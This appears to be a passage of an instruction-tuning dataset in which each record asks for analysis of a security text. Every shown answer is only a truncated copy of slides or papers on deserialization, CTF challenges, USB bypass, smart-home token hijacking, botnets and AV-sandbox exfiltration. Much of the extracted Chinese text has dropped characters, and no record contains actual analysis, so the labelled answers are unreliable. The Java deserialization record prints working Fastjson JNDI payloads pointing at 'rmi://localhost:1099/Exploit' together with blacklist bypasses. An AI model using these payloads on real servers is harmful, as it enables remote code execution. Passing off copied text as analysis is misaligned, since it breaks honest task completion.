DVCS File Regular Expression GIT .git/HEAD ref: refs/' HG .hg/requires revlogv1' BZR .bzr/README This\\sis\\sa\\sBazaar' A discovery plugin called findDVCS.py was created for the W3AF (Web Application Attack and Audit Framework) framework. This plugin uses the above regular expressions for repository identification. PREDICTABLE FILES The next step in extracting repository data is to download files with predictable file locations. Some of these are critical in extracting useful information from the repository. Below is a list of some of the predictable files. Some are left out just because we donʼt care about them. GIT File Notes .git/HEAD Used to identify the repository and repository refʼs .git/config Lists branches and remotes that may provide other targets to attack. .git/index sorted list of path names, each with permissions and the SHA-1 of a blob object [0] .git/logs/HEAD Current HEAD reference .git/hooks/* applypatch-msg.sample,pre-applypatch.sa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypassing Endpoint Security for $20 or Less Philip A. Polstra, Sr. @ppolstra ppolstra.blogspot.com  Why this talk?  Who is this dude talking at me?  Brief history of USB  How does USB work?  Its all descriptors and endpoints  Bulk-only mass storage devices  Bypassing endpoint security  Microcontrollers are fun (and cheap)  Food for thought Roadmap  Many organizations have begun to use endpoint security programs to restrict use of portable media  Many software tools do the USB equivalent of MAC filtering  only allow authorized VID/PID  For $18-30 can easily construct device to allow any mass storage device to impersonate authorized device  Allows injection/extraction Why this talk? Who am I anyway?  Teach computer security at a private university  Like to hack hardware  Have been known to fly and build airplanes  Been known to play with USB devices Brief History or USB  Non-universal serial, PS/2 ports, & LPT  1996 USB 1.0 (1.5 or 12 Mbps)  1998 USB 1.1  2000 USB 2.0 (1.5, 12, or 480 Mbps)  Long pause  2008 USB 3.0 (up to 5 Gbps) HOW DOES USB WORK? Hardware  Simple 4-wire connection (power, ground, 2 data wires)  Cabling prevents improper connections  Hot pluggable  Differential voltages provide greater immunity to noise  Cable lengths up to 16 feet are possible Pin Name Cable color Description 1 VBUS Red +5 V 2 D White Data  3 D+ Green Data + 4 GND Black Ground Software  Automatic configuration  No settable jumpers  Enumeration  Standard device classes with corresponding drivers  HID  Printer  Audio  Mass Storage Connecting a Device  Device is connected  Hub detects  Host (PC) is informed of new device  Hub determines device speed capability as indicated by location of pull-up resistors  Hub resets the device  Host determines if device is capable of high speed (using chirps)  Hub establishes a signal path  Host requests descriptor from device to determine max packet size  Host assigns an address  Host learns devices capabilities  Host assigns and loads an appropriat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n智能家居安全身份劫持 作者挽秋(daizy) 1概要 本文以如何劫持(窃取)智能家居时代设备的身份安全凭证为出发点调研并分析了目 前国内市场的主流产品和设备交互协议及其所依赖身份凭证通过介绍分析和发现设备 交互控制协议安全性最终通过身份劫持实现相关设备和产品的任意远程控制 2智能家居身份和劫持危害 先通过一张简图来了解一下应用智能设备和云端三者交互时携带的身份标识如图 2.1 所示 图 2.1智能家居设备交互时携带的身份标识 从上图了解到智能家居身份标识通常是以下几种情况 1账号 cookie 相关如身份 Token 2用户 iduserid 3设备 iddeviceid 4认证或加密的 key 一旦用户或设备的身份被劫持那么至少存在如下几方面危害 1 个人信息聊天内容等隐私敏感信息泄露 2 智能设备被任意控制 3 财产损失 4 随时被监控 以智能音箱和智能插座等设备为例至少有两个环节设计身份相关 1 账号同步 2 设备交互操作 下面将分别介绍如何在这两个环节进行身份劫持 3账号同步 账号同步是指在智能设备在初次激活使用(或更改绑定用户时)用户将自己的身份信 息同步给设备并绑定设备 一个简化的账号同步流程如图 3.1 所示 APP 设备 1.设备id或key 2.用户身份(token)wifi密码 Server 3.携带Token等信息进行请求 4.返回结果 图 3.1账号同步 账号同步通常会存在如下两类问题 1 设备是否合法验证设备 id 还是设备 keyid 和 key 都很容易泄露伪造 2 账号 Token 如何安全传输设备此时为入网通过蓝牙AP还是其他何种方式传 输账号信息 账号同步时身份劫持 以厂商 A 音箱的配网和身份账号同步为例其账号同步分为两种方式 1直接通过 UDP 广播 255.255.255.255:50000,发送 useridtoken 和 wifi 的 ssid 和 wifi 密 码 2将 useridtokenssid 和 wifi 密码等转化成语音播放音箱进行语音信息识别即可 关 于 两 种 模 式 的 选 择  由 本 地 sharedPreferences 文 件 (tg_app_env.xml) 中 的 app_connect_mode 属性值决定其账号同步代码如图 3.2 所示 图 3.2厂商 A 音箱的账号同步 厂商 A 的音箱将身份信息通过固定协议的格式在 UDP255.255.255.255:50000 端 口进行身份信息发送攻击者可以监听 UDP50000 端口从而获取用户的 userid 和 token 窃取身份凭据语音发送也是按照同一套固定的协议格式发送协议格式通过破解后如 图 3.3 所示 整个 组长 度 厂商A音箱的身份信息广播格式该byte数组一共有4个子数组从左到 右分别是useridtokenssid和password相关 协议 类型 Userid 数组 长度 Token 数组 长度 SSID数 组长 度 Pwd数 组长 度 Byte0 Byte1 Byte2 Byte3 Byte4 Byte5 Byte6 Byte... Byten   存储者Userid变化后byte数组转 换格式new byte=(byte&255)-32) tokenssid和password 数组变换格式同userid 图 3.3厂商 A 音箱的账号信息同步格式 4设备交互 设备交互是指应用设备和云端的三者交互访问交互操作大体分为两种方式 1 只支持广域网厂商 A 为代表 2 支持广域网和局域网厂商 B 和 C 为代表 广域网应用与设备交互设备与设备的交互方式如图 4.1 和 4.2 所示 App Server SmartHome中心 1.APP操作播放音乐 2.播放音乐url 3.播放音乐url 4.音乐播放指令(directive) 智能音箱 图 4.1应用和设备广域网交互 SmartHome中心 第三方云 2.query 1.打开灯 3.控制协议:turn ligth on 4.第三方开灯协议 5.返回操作结果 6.返回操作结果 帐户绑定Oauth2.0 7.已开灯 智能音箱 图 4.2设备和设备广域网交互 厂商 A 的智能家居接入方式已开灯为例 第一步厂商 A 的音箱音箱 server urlhttps://***.com/*** Payload: { Uderid, Deviceid, Accesstoken, 打开灯的语音} 第二步厂商 A 的音箱 sever第三方 server 用户需要在第三方产品 server 注册并通过 Oauth 授权给厂商 A 的 Server消息格式如 下  \"header\":{ namespace:***Genie.Iot.Device.Cont", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# The Vault 2 Category: Pwn, 350 Points ## Description > nc challenges.ctfd.io 30441 ## Solution This is the follow-up challenge for [The Vault 1](The_Vault_1.md). Let's connect to the attached service: ```console root@kali:~# nc challenges.ctfd.io 30441 _____ _ __ __ _ _ ____ |_ _|| |__ ___ \\ \\ / / __ _ _ _ | || |_ |___ \\ | | | '_ \\ / _ \\ \\ \\ / / / _` || | | || || __| _____ __) | | | | | | || __/ \\ V / | (_| || |_| || || |_ |_____| / __/ |_| |_| |_| \\___| \\_/ \\__,_| \\__,_||_| \\__| |_____| ____ ____ ____ ____ ____ ____ ____ ||A ||||B ||||C ||||D ||||E ||||F ||||G || ||__||||__||||__||||__||||__||||__||||__|| |/__\\||/__\\||/__\\||/__\\||/__\\||/__\\||/__\\| ____ ____ ____ ____ ____ ____ ____ ||H ||||I ||||J ||||K ||||L ||||M ||||N || ||__||||__||||__||||__||||__||||__||||__|| |/__\\||/__\\||/__\\||/__\\||/__\\||/__\\||/__\\| ____ ____ ____ ____ ____ ____ ____ ||O ||||P ||||Q ||||R ||||S ||||T ||||U || ||__||||__||||__||||__||||__||||__||||__|| |/__\\||/__\\||/__\\||/__\\||/__\\||/__\\||/__\\| ____ ____ ____ ____ ____ ____ ____ ||* ||||V ||||W ||||X ||||Y ||||Z ||||# || ||__||||__||||__||||__||||__||||__||||__|| |/__\\||/__\\||/__\\||/__\\||/__\\||/__\\||/__\\| Welcome Agent, we need your help to open a Secure Vault. This time, More Twisted Vault !!! We managed to intercept some of the encryption method of the vault. Be aware, You have one time chance to submit the password Good luck !!! *************** Main Menu *************** * * * [ 1 ] ---- Encrypt a Letter * * [ 2 ] ---- Print Encrypted Password * * [ 3 ] ---- Submit Password * * [-1 ] ---- Quit * * * ***************************************** ``` Using this UI, we can encrypt letters: ```console Enter input: 1 Please enter a letter to encrypt A Your encrypted letter is: K Based on: 2317227390 Enter input: 1 Please enter a letter to encrypt A Your encrypted letter is: N Based on: 712378095 Enter input: 1 Please enter a letter to encrypt A Your encrypted letter is: V Based on: 2480001805 Enter input: 1 Please enter a letter to encrypt B You", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBusiness logic flaws in mobile operators services B o g d a n A l e c u Bogdan ALECU About me Independent security researcher Sysadmin Passionate about security, specially when its related to mobile devices; started with NetMonitor (thanks Cosconor), continued with VoIP and finally GSM networks / mobile phones @msecnet / www.m-sec.net Bogdan ALECU GOALS o SIM Toolkit: what is it, how can we exploit it o Understanding of business logic flaws in mobile operators services o What you should do in order to protect from these attacks Bogdan ALECU TOPICS 1. SIM TOOLKIT 2. HTTP HEADERS 3. DATA TRAFFIC VULNERABILITY 4. THE EXTRA DIGIT 5. SUMMARY Bogdan ALECU THE BUGGY WORLD SIM 1 TOOLKIT Bogdan ALECU THE BUGGY WORLD For sending Ringtones, operator logo, concatenated messages, SMS makes use of the User Data Header SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD SIM TOOLKIT 1 Example of SIM Toolkit icon on your mobile device Bogdan ALECU THE BUGGY WORLD SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD The type of message sent is addressed directly to the SIM, by setting the PID to 0x7F, corresponding to USIM Data Download SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD  then the ME shall pass the message transparently to the SIM  shall not display the message, or alert the user of a short message waiting   SIM TOOLKIT 1 ETSI GSM 11.14 Bogdan ALECU THE BUGGY WORLD SIM TOOLKIT 1 Security Parameter Indicator Security Parameter Indicator Security Parameter Indicator Security Parameter Indicator Bogdan ALECU THE BUGGY WORLD SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD UDH (User Data Header): 027000 PID (Protocol ID): 7F DCS (Data Coding Scheme): F6 000e0d00210000b20000aabbccddee00 CPL CHL SPI SPI 0 0 1 0 0 0 0 1 KIc KID TAR CNTR SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD  SIM card automatically replies to the sending number  Nothing in Inbox, Outbox  only on your bill SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD LETS SEE IT IN ACTION! SIM 1TOOLKIT Bogdan ALECU THE B", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nForensic Data Recovery  MyHardDriveDied.com  2009 1 RAID by Sight and Sound By Scott A. Moulton Of My Hard Drive Died & Forensic Strategy Services LLC Forensic Data Recovery  MyHardDriveDied.com  2009 2 Topics for Talk  Brief Coverage of NOT RAID  Brief Intro to RAID  RAID 0  RAID 5  Demo of Rebuild Forensic Data Recovery  MyHardDriveDied.com  2009 3 Assumptions  We are assuming you have already done what I previously described in previous videos and classes to repair the damaged drive.  You now have a running drive and have imaged it in some fashion and will use that for reassembly. Forensic Data Recovery  MyHardDriveDied.com  2009 4 RAID Arrays  Redundant Array of (Inexpensive or Independent) Disks.  Some arrays are not Redundant  Different types of arrays may need different numbers of drives in the array and may give you different results in free space available by how they are setup. Forensic Data Recovery  MyHardDriveDied.com  2009 5 JBOD Drives  Means Just a Bunch of Disks and they are just linked logically together end to end.  These drives usually have no fan, get very hot and contain several drives. Sometimes the cables are melted together.  I have found that some recoveries that are using these JBOD will work once repaired, even if the Lacie board is burnt out, just by placing them in a G5 and connecting them and booting on a Mac external disk. This is great for when you cannot repair the Lacie board or power supply. Forensic Data Recovery  MyHardDriveDied.com  2009 6 LaCie and other JBOD Drives Forensic Data Recovery  MyHardDriveDied.com  2009 7 LaCie and other JBOD Drives Forensic Data Recovery  MyHardDriveDied.com  2009 8 LaCie NAS Boxes Forensic Data Recovery  MyHardDriveDied.com  2009 9 Dynamic Disks  Dynamic disks do not use partition tables, they use LDM which is at the end of the disk and needs to be done backwards. It uses one single partition occupying the entire disk minus one cylinder. When volumes are added or deleted the partition table is no", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对灯塔ARL进些定制-host碰撞 0x00 前 看了下灯塔ARL整体感觉还不错该有的基本功能都有界也不错只不过些细节上不符合我 的预期这两天概浏览了下整体的代码功能拎出个点来先进波优化 0x01 host碰撞原先设计 ARL确实带有host碰撞功能在任务创建 我们跟下host碰撞的实现直接搜host碰撞 接着搜这个findvhost 进这个find_vhost 可以看到在app->services->findVhost.py但是看起来并不是我们要的那种修改host字段后进 爆破的代码逻辑所以接着看看这个find_vhost在哪被调 这块有好个findvhost相关的函数圈红圈的进去看看 这可以看到通过查库找出私有ip对应的域名具体代码应该在别的地概猜猜是差不多 1. 前置域名爆破获取到包含私有ip地址解析的域名存进库 2. 这通过find_private_domain_by_task_id查库找出私有ip对应的级域名放待爆破的host碰 撞域名 3. 在通过find_public_ip_by_task_id查找出对应扫描任务获取到的公ip 4. 把这两个放起通过find_vhost函数进爆破如果爆破出存在则返回结果 也就是说这的host碰撞是基于前期域名搜集时是否获取到解析到私有地址的域名来进的 这确实是个但是我这边还希望增加另个功能给定个关键字列表爆破是否存在该关 键词对应的内部域名如grafana.guahao.com绑定到个公ip进爆破是否存在内部 grafana 0x02 增加列表爆破 概明前的过程后其实我们只需要增加个本地字典读取然后起加到前的域名列表去 就了修改部分代码就够了 先整理下思路 1. 获取到任务内所有已经有的域名包括根域名和域名 2. 在根域名和域名前加上字典列表后形成个新的域名 3. 新域名传后续进host碰撞 那么现在还有个问题就是如何获取根域名和域名列表这出于速度来考虑可以先实现根域名后 续再考虑把域名也带上 如果我们只需要考虑根录上的爆破的话那么就这样就了 好了我们加了段定义的host列表的碰撞需求这样保存下接着跑就了 0x03 总结 其实是个较简单的需求修改但是这个修改可能会帮助我们找到更多的漏洞基本上这样修改 后就能覆盖掉所有我认为需要host爆破的场景形成动发觉动碰撞了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Hacking Iraq Hacking Iraq Michael Schearer ( Michael Schearer (theprez98 theprez98)) presents 2 Plan of Attack Plan of Attack Introduction Disclaimers My Background Why is the Navy in Iraq? Iraqi Communications Infrastructure IEDs Composition, Typology, Counter-IED Strategy The Future 3 Introduction Introduction Operational Security (OPSEC) Challenges and Limitations 4 Disclaimers Disclaimers This presentation is UNCLASSIFIED. On some issues I may be able to speak in generalities but not specifics. Nothing in this presentation is classified or For Official Use Only, nor does it contain information regarding incidents under ongoing investigation or any information protected by the Privacy Act. 5 Disclaimers Disclaimers This presentation complies with DOD Directives 5230.9, 5400.7, and 5500.7. All images, videos and/or media within this presentation were obtained from open sources using unclassified search terms. I am not here as a representative of the U.S. government or U.S. Navy. I am not here to be for or against the war. Please leave your politics at the door! 6 My Background My Background Active Duty, U.S. Navy Lieutenant (O-3) EA-6B Prowler Electronic Countermeasures Officer (Naval Flight Officer) Licensed Extra Class Amateur Radio Operator (N3WI) Church of WiFi Forums Administrator Remote-Exploit Forums Moderator Regular on DEFCON and NetStumbler forums 7 8 9 Why is the Navy in Iraq? Why is the Navy in Iraq? Threat from Improvised Explosive Devices 10 Improvised Explosive Devices Improvised Explosive Devices The majority of insurgent attacks come in the form of IEDs targetting Iraqi and Coalition convoys and patrols. Most IEDs are made from leftover munitions and foreign explosive materials which are often hastily put together. Vehicle borne IEDs, VBIEDs, are devices that use a vehicle as the package or container of the device. These IEDs come in all shapes and sizes, from small sedans to large cargo trucks. There have even been instances of what appeared to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python from Crypto.Util.number import * from gmpy import * import os,sys sys.stdin = os.fdopen(sys.stdin.fileno(), 'r', 0) sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) def genKey(): p = getPrime(512) q = getPrime(512) n = p*q phi = (p-1)*(q-1) while True: e = getRandomInteger(40) if gcd(e,phi) == 1: d = int(invert(e,phi)) return n,e,d def calc(n,p,data): num = bytes_to_long(data) res = pow(num,p,n) return long_to_bytes(res).encode('hex') def readFlag(): flag = open('flag').read() assert len(flag) >= 50 assert len(flag) <= 60 prefix = os.urandom(68) return prefix+flag if __name__ == '__main__': n,e,d = genKey() flag = calc(n,e,readFlag()) print 'Here is the flag!' print flag for i in xrange(150): msg = raw_input('cmd: ') if msg[0] == 'A': m = raw_input('input: ') try: m = m.decode('hex') print calc(n,e,m) except: print 'no' exit(0) elif msg[0] == 'B': m = raw_input('input: ') try: m = m.decode('hex') print calc(n,d,m)[-2:] except: print 'no' exit(0)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n, , , Las Vegas , 2012 Aditya K Sood | Richard J Enbody SecNiche Security | Department of Computer Science and Engineering Michigan State University Botnets Die Hard Owned and Operated 2 About Us  Aditya K Sood  PhD Candidate at Michigan State University  Working with iSEC Partners  Founder, SecNiche Security Labs  Worked previously for Armorize, Coseinc and KPMG  Active Speaker at Security conferences  LinkedIn - http ://www.linkedin.com/in/adityaks  Website: http://www.secniche.org | Blog: http://secniche.blogspot.com  Twitter: @AdityaKSood  Dr. Richard J Enbody  Associate Professor, CSE, Michigan State University  Since 1987, teaching computer architecture/ computer security / mathematics  Co-Author CS1 Python book, The Practice of Computing using Python.  Patents Pending  Hardware Buffer Overflow Protection 3 Disclaimer  This research relates to my own efforts and does not provide the view of any of my present and previous employers. 4 Agenda  Bot Spreading Mechanisms  Browser Exploit Packs  Drive-by-Download frameworks  Spreaders  Demonstration  POST Exploitation  Understanding Ruskill  DNS Changer in Action  Other System Manipulation Tactics  Demonstration  Exploiting Browsers/HTTP  Man in the Browser  Formgrabbing  Web Injects  Demonstration  Conclusion 5 Rise of Third Generation Botnets (TGB) Zeus | SpyEye | Andromeda | Smoke | NGR | Upas |  . .. .. . . .. 6 TGB Infections started with Zeus ! 7 Bot Spreading Mechanisms Widely Deployed 8 Browser Exploit Packs  Browser Exploit Packs (BEPs)  Overview  Automated frameworks containing browser exploits  Implements the concept of Drive-by-Download attacks  Exploits are bundled as unique modules  Mostly written in PHP + MySQL  PHP code is obfuscated with Ion Cube encoder  Successfully captures the statistics of infected machine  Widely used BEPs are  BlackHole / Nuclear / Phoenix etc.  How is the exploit served?  Fingerprinting browsers environment  User-Agent string parameters  Plugin detection module  Java / PDF /", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n云影实验室 1 / 17 .NET 高级代码审计第二课 Json.Net 反序列化漏洞 Ivan1ee@360 云影实验室 2019 年 03 月 01 日 云影实验室 2 / 17 0X00 前言 Newtonsoft.Json这是一个开源的 Json.Net 库官方地址 https://www.newtonsoft.com/json 一个读写 Json 效率非常高的.Net 库在做开 发的时候很多数据交换都是以 json 格式传输的而使用 Json 的时候开发者很多时 候会涉及到几个序列化对象的使用DataContractJsonSerializer JavaScriptSerializer 和 Json.NET 即 Newtonsoft.Json大多数人都会选择性能以及 通用性较好 Json.NET这个虽不是微软的类库但却是一个开源的世界级的 Json 操作 类库从下面的性能对比就可以看到它的性能优点 用它可轻松实现.Net 中所有类型(对象,基本数据类型等)同 Json 之间的转换在带来便 捷的同时也隐藏了很大的安全隐患在某些场景下开发者使用 DeserializeObject 方法 序列化不安全的数据就会造成反序列化漏洞从而实现远程 RCE 攻击本文笔者从原 理和代码审计的视角做了相关介绍和复现 云影实验室 3 / 17 0X01 Json.Net 序列化 在 Newtonsoft.Json 中使用 JSONSerializer 可以非常方便的实现.NET 对象与 Json 之 间的转化JSONSerializer 把.NET 对象的属性名转化为 Json 数据中的 Key把对象的 属性值转化为 Json 数据中的 Value如下 Demo定义 TestClass 对象 并有三个成员Classname 在序列化的过程中被忽略JsonIgnore此外实现了一个 静态方法 ClassMethod 启动进程 序列化过程通过创建对象实例分别给成员赋值 云影实验室 4 / 17 用 JsonConvert.SerializeObject 得到序列化后的字符串 {\"Name\":\"Ivan1ee\",\"Age\":18} Json 字符串中并没有包含方法 ClassMethod因为它是静态方法不参与实例化的过 程自然在 testClass 这个对象中不存在这就是一个最简单的序列化 Demo为了尽 量保证序列化过程不抛出异常笔者引入 SerializeObject 方法的第二个参数并实例化 创建 JsonSerializerSettings下面列出属性  NullValueHandling如果序列化时需要忽略值为 NULL 的属性使用 JsonSerializerSettings.NullValueHandling.Ignore 来实现  TypeNameAssemblyFormatHandling默认情况下 Json.NET 只使用类型中的 部分程序集名称如System.Data.DataSet为了避免在一些环境下不兼容的 问题需要用到完整的程序集名称包括版本号公钥等所以用到 JsonSerializerSettings.TypeNameAssemblyFormatHandling.Full  TypeNameHandling控制 Json.NET 是否在使用$type 属性进行序列化时包 含.NET 类型名称并从该属性读取.NET 类型名称以确定在反序列化期间要创建 的类型 修改代码添加 TypeNameAssemblyFormatHandling.FullTypeNameHandling.ALL 将代码改成这样后得到的 testString 变量值才是笔者想要的打印的数据中带有完整的 程序集名等信息 {\"$type\":\"WpfApp1.TestClass, WpfApp1, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\",\"Name\":\"Ivan1ee\",\"Age\":18} 云影实验室 5 / 17 0x02 Json.Net 反序列化 2.1反序列化用法 反序列过程就是将 Json 字符串转换为对象通过创建一个新对象的方式调用 JsonConvert.DeserializeObject 方法实现的传入两个参数第一个参数需要被序列 化的字符串第二个参数设置序列化配置选项来指定 JsonSerializer 按照指定的类型名 称处理其中 TypeNameHandling 可选择的成员分为五种 默认情况下设置为 TypeNameHandling.None表示 Json.NET 在反序列化期间不读取 或写入类型名称具体代码可参考以下 2.2攻击向量ObjectDataProv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJava反序列化实战 绿盟科技安全研究经理 廖新喜@xxlegend 绿盟科技攻防实验室招人  研究方向webshell检测安全大数据分析  联系邮箱liaoxinxi[@]nsfocus.com或者 liwenjin[@]nsfocus.com  绿盟科技 安全研究经理  看雪大会讲师Pycon大会讲师央视 专访嘉宾  向RedHatApacheAmazon Weblogic阿里提交多份RCE漏洞报告  博客xxlegend.com 个人介绍 反序列化入门 Fastjson Weblogic 反序列化防御 反序列化入门  序列化是用于将对象转换成二进制串存储对应着writeObject  反序列正好相反将二进制串转换成对象对应着readObject  类必须实现反序列化接口 序列化和反序列化  工具SerializationDumper  Magic头0xaced  TC_OBJECT:0x73  TC_CLASS:0x72  serialVersionUID  newHandle 存储格式  http参数cookiesesion存储方式可能是base64rO0 压缩后的base64H4slMII等  Servlets HTTPSocketsSession管理器 包含的协议就包括 JMXRMIJMSJNDI等\\xac\\xed  xml Xstream,XMLDecoder等HTTP BodyContent- Type:application/xml  json(Jacksonfastjson) http请求中包含 使用场景  Ysoserial 原生序列化PoC生成  Marshalsec 第三方格式序列化PoC生成  Freddy burp反序列化测试插件  Java-Deserialization-Cheat-Sheet 反序列化项目 Fastjson Weblogic  Fastjson是Alibaba开发的Java语言编写的高性能JSON库采用假定有序 快速匹配的算法号称Java语言中最快的JSON库  提供两个主要接口toJsonString和parseObject来分别实现序列化和反序列化  序列化  反序列化 Fastjson简介  基于TemplateImpl  基于JNDI a) Bean Property类型 b) Field类型 c) Demohttps://github.com/shengqi158/fastjson-remote-code-execute-poc Fastjson PoC分类  基于hash加密算法不可逆  简单穷举基本算不出来  爬取Maven仓库提取所有库 Fastjson黑名单 一个loadClass的锅 1.2.43的绕过方法是 [com.sun.rowset.RowSetImp. 1.2.41的绕过方法是 Lcom.sun.rowset.RowSetImpl; 1.2.42的绕过方法是 LLcom.sum.rowset.RowSetImpl;; PoC示例 {\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\",\" \"autoCommit\":true} 基于ibatis {\"@type\":\"org.apache.ibatis.datasource.jndi. JndiDataSourceFactory\",\"properties\":{\"data_ source\":\"rmi://localhost:1099/Exploit\"}} 1.2.45 PoC 直接利用data_source  Weblogic是第一个成功商业化的J2EE应用服务器  在Oracle旗下可以与其他Oracle产品强强联手  WebLogic Server Java EE 应用基于标准化模块化的组件 WebLogic Server 为这些模块提供了一组完整的服务无需编 程即可自动处理应用行为的许多细节  独有的T3协议 Weblogic Weblogic 2017 Weblogic 序列化漏洞 CVE-2015-4852 Commons-Collections CVE-2016-3510 MarshalledObject CVE-2016-0638 StreamMessage CVE-2017-3248 JRMPListener CVE-2017-10271 XMLDecoder绕过 CVE-2017-3506 XMLDecoder CVE-2018-2628 JRMPClient  基于T3  新的攻击面  基于commons-collections  采用黑名单修复  作用位置有限 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 THE ADVENTURES OF AV AND THE LEAKY SANDBOX A SafeBreach Labs research paper by Amit Klein, VP Security Research, SafeBreach and Itzik Kotler, co-founder and CTO, SafeBreach July 2017 2 ABSTRACT We describe and demonstrate a novel technique for exfiltrating data from highly secure enterprises which employ strict egress filtering - that is, endpoints have no direct Internet connection, or the endpoints connection to the Internet is restricted to hosts required by their legitimately installed software. Assuming the endpoint has a cloud-enhanced anti-virus product installed, we show that if the anti-virus (AV) product employs an Internet-connected sandbox as part of its cloud service, it actually facilitates such exfiltration. We release the tool we developed to implement the exfiltration technique, and we provide real-world results from several prominent AV products (by Avira, ESET, Kaspersky and Comodo). Our technique revolves around exfiltrating the data inside an executable file which is created on the endpoint (by the main malware process), detected by the AV agent, uploaded to the cloud for further inspection, and executed in an Internet connected sandbox. We also provide data and insights on those AV in-the-cloud sandboxes. We generalize our findings to cover on-premise sandboxes, use of cloud-based/online scanning and malware categorization services, and sample sharing at large. Lastly, we address the issues of how to further enhance the attack, and how cloud-based AV vendors can mitigate it. INTRODUCTION Exfiltration of sensitive data from a well-protected enterprise is a major goal for cyber attackers. Network-wise, our reference scenario is an enterprise whose endpoints are not allowed direct communication with the Internet, or an enterprise whose endpoints are only allowed Internet connections to a closed set of external hosts (such as Microsoft update servers, AV update servers, etc.). And since the organization is well protected, its quite likely to have", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved. The Wide World of WAFs Ben Feinstein, CISSP GCFA SecureWorks Counter Threat Unit DEFCON 16 August 8, 2008 The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Web Application Firewalls (WAFs)  PCI Data Security Standard  Requirement 6.6  Why should you care?  ModSecurity  Concepts  Core Rules  ModSecurity WAF Live Demos  Reverse Proxy  Embedded  Content Injection in Response to Attack Whats In This Talk? The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Firewall operating at the web application layer  Hardware or Software  Fluent in many tongues  HTTP / HTTPS  XML  SOAP  XML-RPC  WS-*  Performs normalization / de-obfuscation  Detects attacks  Blocks attacks  Rewrites / Modifies requests and responses Web Application Firewalls (WAFs) The Basics The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Apache dynamically loadable module  Dual License  Community Edition - GPLv2  Commercial License  Created by Ivan Ristic  Commercialized by Breach Security  Core Rules released under GPLv2 ModSecurity Web App Firewalls The Basics The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  I apologize in advance if I bore you  PCI is driving adoption of WAF (and Web App Vulnerability Scanning)  Pentesters (i.e. QSAs): PCI will drive your business. You will need to be familiar with WAFs to evaluate and subvert them.  IT Security: You will be deploying WAFs because of PCI  Blackhats: You will be subverting WAFs for fun and profit! Meet the Payment Card Industry! Why Should You Care? The Information Security Experts Copyright  2008 SecureWorks, Inc. All rights reserved.  Lots of new acronyms, yea!  PCI Security Standards Council (PCI)  PCI Data Security Standard (PCI DSS)  Other PCI security standards exist  PIN Entry Devices (PEDs)  Payment Application Da", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" This manpage has been automatically generated by docbook2man-spec .\\\" from a DocBook document. docbook2man-spec can be found at: .\\\" <http://shell.ipoline.com/~elmert/hacks/docbook2X/> .\\\" Please send any bug reports, improvements, comments, patches, .\\\" etc. to Steve Cheng <steve@ggi-project.org>. .TH SMBCONTROL 1 \"17 Apr 2001\" \"smbcontrol 2.2.0\" .SH NAME smbcontrol \\- 向smbd或nmbd进程发送消息 .SH 总览 .sp \\fBsmbcontrol\\fR [ \\fB-i\\fR ] .sp \\fBsmbcontrol\\fR [ \\fB目标\\fR ] [ \\fB消息类型\\fR ] [ \\fB参数\\fR ] .SH 描述 .PP 这个工具是是Samba组件的一部分 .PP \\fBsmbcontrol\\fR是个很小的程序用它可以向系统上运行的smbd(8) 或nmbd(8)进程发送消息 .SH 选项 .TP \\fB-i\\fR 以交互方式运行在标准输入上可以输入单独的``目标 消息类型 参 数''形式的命令输入空行或``q''字符退出程序 .TP \\fB目标\\fR \\fInmbd\\fR或\\fIsmbd\\fR或进程ID 如果使用\\fIsmbd\\fR目标则向所有smbd进程广播消息 如果使用\\fInmbd\\fR目标则向\\fInmbd.pid\\fR指定的nmbd进程发送 消息 如果使用一个进程ID则只向该进程发送消息 .TP \\fB消息类型\\fR 有这几种类型debugforce-electionpingprofiledebuglevel profilelevelprinter-notify debug消息可以把调试等级设为参数所指定的值可以向所有目标发送 这种类型的消息 force-election消息只能向nmbd发送这种消息使\\fBnmbd\\fR进程强 制进行一次新的主浏览器选举 ping消息发送指定数量的\\(lqping\\(rq并等待相同数量的回复可以向所 有目标发送这种类型的消息 